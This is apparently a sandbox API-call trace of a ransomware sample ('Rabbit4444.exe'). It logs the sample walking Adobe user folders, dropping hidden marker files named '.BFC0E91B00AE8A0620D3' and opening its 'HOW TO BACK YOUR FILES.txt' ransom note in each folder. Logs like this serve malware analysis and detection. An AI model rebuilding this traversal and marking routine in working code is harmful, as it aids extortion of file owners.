1 [0054.467] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE") returned 97 [0054.467] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.467] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a224c46, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5a224c46, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9c8b19b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0054.467] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.467] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.467] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.467] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.467] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5a224c46, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5a224c46, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9c8b19b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.467] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.467] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.467] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.467] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.467] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.467] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9c8b19b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9c8b19b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9c8b19b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.467] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.467] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.468] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9c8b19b, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9c8b19b, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9c8b19b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.468] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0054.468] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.468] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_DE\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\de_de\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.468] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.469] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.469] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.469] CloseHandle (hObject=0x278) returned 1 [0054.469] CloseHandle (hObject=0x27c) returned 1 [0054.469] GetCurrentThreadId () returned 0xd98 [0054.469] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0054.469] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH" [0054.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1161e0 | out: hHeap=0xe0000) returned 1 [0054.469] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0054.469] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH" [0054.469] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH\\" [0054.469] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH\\.BFC0E91B00AE8A0620D3" [0054.469] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\de_ch\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.470] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.473] FlushFileBuffers (hFile=0x27c) returned 1 [0054.473] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.474] CloseHandle (hObject=0x27c) returned 1 [0054.474] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH") returned 97 [0054.474] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.474] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x59d60336, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x59d60336, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9cb1436, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0054.474] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.474] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.474] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.474] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.474] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x59d60336, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x59d60336, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9cb1436, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.474] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.474] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.475] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.475] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.475] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.475] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9cb1436, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9cb1436, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9cb1436, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.475] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.475] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.475] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9cb1436, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9cb1436, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9cb1436, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.475] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0054.475] lstrcpyW (in: lpString1=0x130ebfc, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.475] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\de_CH\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\de_ch\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.476] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.476] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.476] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.477] CloseHandle (hObject=0x278) returned 1 [0054.477] CloseHandle (hObject=0x27c) returned 1 [0054.477] GetCurrentThreadId () returned 0xd98 [0054.477] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6390 [0054.477] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all" [0054.477] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10a2f0 | out: hHeap=0xe0000) returned 1 [0054.477] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6388 | out: hHeap=0xe0000) returned 1 [0054.477] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all" [0054.477] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all\\" [0054.477] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all\\.BFC0E91B00AE8A0620D3" [0054.477] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\all\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.478] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.480] FlushFileBuffers (hFile=0x27c) returned 1 [0054.481] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.481] CloseHandle (hObject=0x27c) returned 1 [0054.482] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all") returned 95 [0054.482] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.482] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x525e22af, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x525e22af, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9cb1436, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1027d0 [0054.482] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.482] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.482] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.482] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.482] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x525e22af, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x525e22af, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9cb1436, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.482] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.482] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.482] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.482] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.482] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.482] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9cb1436, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9cb1436, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9cb1436, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.482] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.482] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.482] FindNextFileW (in: hFindFile=0x1027d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9cb1436, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9cb1436, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9cb1436, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.483] FindClose (in: hFindFile=0x1027d0 | out: hFindFile=0x1027d0) returned 1 [0054.483] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.483] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\all\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\all\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.483] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.483] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.483] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.484] CloseHandle (hObject=0x278) returned 1 [0054.484] CloseHandle (hObject=0x27c) returned 1 [0054.484] GetCurrentThreadId () returned 0xd98 [0054.484] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6670 [0054.484] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat" [0054.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11c5e0 | out: hHeap=0xe0000) returned 1 [0054.484] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6668 | out: hHeap=0xe0000) returned 1 [0054.484] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat" [0054.484] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\" [0054.484] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\.BFC0E91B00AE8A0620D3" [0054.484] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\acrobat\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.485] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.487] FlushFileBuffers (hFile=0x27c) returned 1 [0054.488] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.488] CloseHandle (hObject=0x27c) returned 1 [0054.489] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat") returned 46 [0054.489] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.489] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Acrobat\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7157dbce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe9cd766d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0054.489] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.489] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.489] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.489] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.489] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x7157dbce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xe9cd766d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.489] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.489] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.489] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.489] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.489] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.489] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9cd766d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9cd766d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9cd766d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.489] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 